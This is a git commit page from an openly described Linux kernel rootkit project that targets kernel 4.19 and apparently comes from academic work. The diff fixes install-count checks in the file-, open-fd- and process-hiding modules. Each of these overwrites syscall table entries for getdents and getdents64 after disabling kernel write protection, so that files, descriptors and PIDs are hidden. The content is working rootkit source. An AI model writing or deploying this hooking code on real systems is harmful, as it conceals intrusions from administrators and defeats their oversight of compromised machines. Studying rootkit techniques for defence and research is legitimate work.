linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 8e8eda3ea1468380d2416ffd4a45e54554a0acdf
parent b473b83b5c4cf55cf529b0dba4c70da4f28318f3
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 14:37:06 +0100

fixes erroneous install count checking

Diffstat:

Msrc/filehide.c | 8++------


Msrc/openhide.c | 8++------


Msrc/pidhide.c | 8++------


3 files changed, 6 insertions(+), 18 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -14,9 +14,7 @@
 void
 hide_files(void)
 {
-    if (atomic_inc_return(&getdents_install_count) >= 1) {
-        atomic_set(&getdents_install_count, 1);
-
+    if (atomic_inc_return(&getdents_install_count) == 1) {
         disable_protection();
         sys_calls[__NR_getdents] = (void *)g7_getdents;
         sys_calls[__NR_getdents64] = (void *)g7_getdents64;
@@ -27,9 +25,7 @@ hide_files(void)
 void
 unhide_files(void)
 {
-    if (atomic_dec_return(&getdents_install_count) < 0) {
-        atomic_set(&getdents_install_count, 0);
-
+    if (atomic_dec_return(&getdents_install_count) < 1) {
         if (sys_getdents) {
             disable_protection();
             sys_calls[__NR_getdents] = (void *)sys_getdents;
diff --git a/src/openhide.c b/src/openhide.c
@@ -26,9 +26,7 @@ fd_list_t_ptr hidden_fds_tail = &hidden_fds;
 void
 hide_open(void)
 {
-    if (atomic_inc_return(&getdents_install_count) >= 1) {
-        atomic_set(&getdents_install_count, 1);
-
+    if (atomic_inc_return(&getdents_install_count) == 1) {
         disable_protection();
         sys_calls[__NR_getdents] = (void *)g7_getdents;
         sys_calls[__NR_getdents64] = (void *)g7_getdents64;
@@ -39,9 +37,7 @@ hide_open(void)
 void
 unhide_open(void)
 {
-    if (atomic_dec_return(&getdents_install_count) < 0) {
-        atomic_set(&getdents_install_count, 0);
-
+    if (atomic_dec_return(&getdents_install_count) < 1) {
         if (sys_getdents) {
             disable_protection();
             sys_calls[__NR_getdents] = (void *)sys_getdents;
diff --git a/src/pidhide.c b/src/pidhide.c
@@ -15,9 +15,7 @@ pid_list_t_ptr hidden_pids_tail = &hidden_pids;
 void
 hide_pids(void)
 {
-    if (atomic_inc_return(&getdents_install_count) >= 1) {
-        atomic_set(&getdents_install_count, 1);
-
+    if (atomic_inc_return(&getdents_install_count) == 1) {
         disable_protection();
         sys_calls[__NR_getdents] = (void *)g7_getdents;
         sys_calls[__NR_getdents64] = (void *)g7_getdents64;
@@ -28,9 +26,7 @@ hide_pids(void)
 void
 unhide_pids(void)
 {
-    if (atomic_dec_return(&getdents_install_count) < 0) {
-        atomic_set(&getdents_install_count, 0);
-
+    if (atomic_dec_return(&getdents_install_count) < 1) {
         if (sys_getdents) {
             disable_protection();
             sys_calls[__NR_getdents] = (void *)sys_getdents;